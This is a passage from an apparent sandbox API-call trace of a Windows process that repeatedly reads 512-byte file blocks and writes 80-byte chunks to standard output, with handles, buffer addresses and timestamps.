lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.799] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.799] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.801] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.801] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.803] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.803] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.804] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.804] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.806] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.806] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.807] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.807] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.809] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.809] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.810] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.810] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, 